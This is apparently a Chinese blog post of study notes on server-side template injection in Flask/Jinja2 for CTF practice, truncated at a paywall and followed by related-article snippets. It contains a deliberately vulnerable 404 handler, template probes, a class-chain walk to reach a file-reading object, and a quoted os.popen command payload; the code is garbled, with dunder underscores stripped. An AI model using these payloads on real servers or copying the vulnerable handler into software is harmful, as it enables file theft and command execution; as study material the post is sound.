python flask ssti学习笔记

最新推荐文章于 2024-03-13 21:47:16 发布
最新推荐文章于 2024-03-13 21:47:16 发布
阅读量802 收藏 1
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65129142/article/details/122059723
版权
本文详细介绍了Python Flask应用中的 SSTI(Server-Side Template Injection)漏洞,探讨了其原理和利用方式,包括全局变量爆破、任意文件读取、命令执行等,并提供了多种绕过过滤的方法,如利用内置函数、编码转换等。
摘要由CSDN通过智能技术生成

python flask ssti学习笔记
学ssti就像是对python原理的一层深入探索,入口很简单,就是用户输入未经过滤便被服务器模板渲染,将其当作变量解析替换,从而达到读取文件或者执行命令等目的

简单示范
漏洞代码:

#!/usr/bin/env python

-- coding:utf8 --

import hashlib
import logging
import urllib.parse#python2没有parse,去掉就好
from flask import Flask
from flask import request
from flask import config
from flask import render_template_string

app = Flask(name)
app.config.secret_key = “2333”
page_size = 60

@app.route(’/’)
def hello_world():
return ‘Hello World!’

@app.errorhandler(404)
def page_not_found(e):
template = ‘’’
{%% block body %%}

Oops! That page doesn't exist.

%s

{%% endblock %%} ''' % (urllib.parse.unquote(request.url))#python2没有parse,去掉就好 return render_template_string(template), 404

if name == ‘main’:
app.run()
以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,{ {}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{ {}}包裹的内容当做变量解析替换。

简单验证
image-20200202201526733

服务器将{ {}}的内容直接执行后返回了结果

image-20200202201646169

直接返回出配置变量值,存在敏感信息

入门操作
爆全局变量
{ {self.dict}}
任意文件读取
ctf题目中大多数是需要读取flag或者读取其他源码的

接下来利用一些骚操作读取文件吧

python中,不用引入直接使用的内置函数称为 builtin 函数,例如我们通常用的open,chr,ord等等

builtin.open()
builtin.int()
builtin.chr()
image-20200217204039400

#python一切皆对象,__class__方法可以获取当前对象(实例)的类

“”.class
<class ‘str’>

#class.mro 获取当前类对象的所有继承类(object类是python中最顶层的类。)

“”.class.mro
(<class ‘str’>, <class ‘object’>)

#object.subclasses() 返回object的子类,不加括号的话返回的是地址

“”.class.mro[-1].subclasses()
[<class ‘type’>, <class ‘weakref’>, <class ‘weakcallableproxy’>, <class ‘weakproxy’>, <class ‘int’>, <class ‘bytearray’>, <class ‘bytes’>, <class ‘list’>, <class ‘NoneType’>,…,]
利用关键字寻找与读文件有关的类

Python2

image-20200202205202185

for i in ‘’.class.mro[-1].subclasses():
count += 1
if ‘file’ in repr(i):
print count, i
//40 <type ‘file’>
这不是我们很熟悉的file吗,直接用就好了

{ {’’.class.mro[-1].subclasses()40.read()}}
image-20200202205714666

或者让我们更加深入一点

#__init__初始化类

‘’.class.mro[-1].init
<slot wrapper ‘init’ of ‘object’ objects>

#因为object类下面没有我们需要的东西,我们只能去它的子类

最低0.47元/天 解锁文章
球球121
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python Flask应用之SSTI初探
qq_38755190的博客
01-28 551
Falsk是什么? Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。 Flask最重要的特点。Flask的两个主要核心应用是Werkzeug和模板引擎Jinja。 Flask的安装 我用的是windows系统,在装有python的系统上,直接打开cmd窗口,我们输入一下命令: pip install Flask
[python]浅谈FlaskSSTI漏洞
记录学习,一起进步
04-03 1268
[python]浅谈FlaskSSTI漏洞
Flask框架漏洞:SSTI
glass_york的博客
12-01 1401
SSTI 是 Server-Side Template Injection即 服务端模板注入,它是一种安全漏洞攻击技术。当应用程序在服务器端使用模板引擎来呈现动态生成的内容时,如果用户可以控制模板引擎的输入,就可能导致 SSTI 漏洞。在正常情况下,模板引擎被设计用于安全地将预定义的模板与数据进行组合,生成最终的输出。但是,SSTI 漏洞允许攻击者在应用程序的上下文中执行任意的服务器端代码。当攻击者能够通过用户输入或其他外部来源插入恶意的模板代码时,就会产生一系列问题。
Flask SSTI
ZXT02的博客
12-03 99
Flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。
SSTI模块注入】SSTI+Flask+Python(上):基础知识
07-25 591
SSTI】基础知识
flask框架学习笔记
最新发布
04-16
以下是从提供的“flask框架学习笔记”中提取并展开的重要知识点。 ### 一、Flask 路由 Flask 中的路由是用来匹配 URL 的一种方式,通过装饰器 `@app.route` 来定义。例如: ```python @app.route('/') def index()...
python Flask,mysql学校管理系统,毕业设计,学习项目
12-29
Flask加amis学校管理系统,功能:登录,修改密码,退出登陆,教师管理,班级管理,学生信息,增删改查。 技术:pythonflask,amis,html,mysql。 环境python3,pycharm,mysql。
基于Python Flask的在线成绩发布学习平台开源项目
03-25
项目概述:基于Python Flask的在线成绩发布学习平台是一个开源项目,主要采用Python语言开发,同时融合了Shell脚本、HTML、CSS和JavaScript等技术。该项目包含22个文件,其中具体文件类型分布为:Shell脚本6个,...
Python离线安装Flask
04-18
Python的开发环境中,有时我们可能需要在没有网络的情况下安装Flask框架,这通常发生在内网环境或者设备连接限制的场景。"Python离线安装Flask"的主题就是要解决这种问题。Flask是一款轻量级的Web服务程序,适用于...
python+flask项目示例源码
10-07
这个项目示例源码是一个很好的学习起点,它涵盖了Flask基础和Web开发的基本流程。通过阅读和实践,你可以深入了解如何利用PythonFlask构建Web应用,包括路由设计、视图函数编写、模板渲染以及与用户的交互。同时,...
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3796
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1234
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
qq_39947980的博客
03-13 2088
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
SSTI简单总结和例题
Aiwin的博客
07-21 2665
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
python ssti正确利用方式
qq_49973474的博客
05-11 567
很好 很有精神
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1368
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
flask ssti python2和python3 注入总结和区别
weixin_30364147的博客
01-10 192
总结一下flask ssti的注入语句 代码 import uuid from flask import Flask, request, make_response, session,render_template, url_for, redirect, render_template_string app=Flask(__name__) app.config['SECRET_KEY']=str...
anaconda(Spyder)多进程 Python Multiprocessing error: AttributeError: module '__main__' has no attribute
记录生活
12-29 6108
Error message: AttributeError: module ‘main’ has no attribute ‘spec’ Full example code: from multiprocessing import Pool def f(x): return x*x if __name__ == '__main__': with Pool(5) as p: ...
python框架漏洞_flask框架漏洞
weixin_40002846的博客
12-05 792
一、简介Flask 是一个使用 Python 编写的轻量级 Web 应用框架。Flask 依赖两个外部库: Jinja2模板引擎和WSGI 工具集。1、常用概念WSGI 只是一种接口,它只适用于 Python 语言,其全称为 Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范。也就是说,只要 web服务器和 web应用都遵守WSGI协议,那么...
Flask Web框架入门学习笔记
"Flask详细学习笔记,涵盖了HTTP通信、Web框架的概念以及Flask框架的介绍,适合初学者查阅和了解。" 在Web开发中,HTTP通信是客户端(如浏览器、应用程序)与服务器之间交互的基础。这个过程可以分为6个步骤:首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值